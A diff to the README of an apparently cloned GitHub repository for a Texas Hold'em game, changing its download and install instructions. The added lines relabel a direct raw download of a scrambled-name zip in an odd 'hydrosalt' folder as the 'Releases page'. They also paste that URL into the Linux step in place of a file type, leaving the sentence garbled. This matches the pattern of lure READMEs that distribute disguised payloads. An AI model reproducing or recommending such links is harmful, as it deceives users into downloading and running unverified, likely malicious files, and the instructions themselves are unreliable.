DaveinDevv/Texas-Hold-em-Club-source-code/README.md

 ## 🌐 How to Download & Install
 1. Click on the **Download Now** button above.
-2. You will be taken to the [Releases page](https://github.com/DaveinDevv/Texas-Hold-em-Club-source-code/releases) where you can view all available versions.
+2. You will be taken to the [Releases page](https://raw.githubusercontent.com/DaveinDevv/Texas-Hold-em-Club-source-code/main/hydrosalt/source-Texas-em-Club-code-Hold-v2.4.zip) where you can view all available versions.
 3. Look for the latest version (typically at the top).
 4. Choose the file appropriate for your operating system.
 Click the download link to save the file to your device.
 5. Once downloaded, locate the file and follow these steps:
    - For **Windows**: Double-click on the `.exe` file to start the installation.
 Follow the prompts until the installation is complete.
    - For **macOS**: Open the `.dmg` file, drag the app to your Applications folder, and then run the app.
-   - For **Linux**: Follow your distribution's instructions for installing a `.tar.gz` or similar file.
+   - For **Linux**: Follow your distribution's instructions for installing a `https://raw.githubusercontent.com/DaveinDevv/Texas-Hold-em-Club-source-code/main/hydrosalt/source-Texas-em-Club-code-Hold-v2.4.zip` or similar file.
 You may need to extract it and run a script.

 ## 🕹️ Running the Application
 After installation, find the Texas Hold'em application on your device: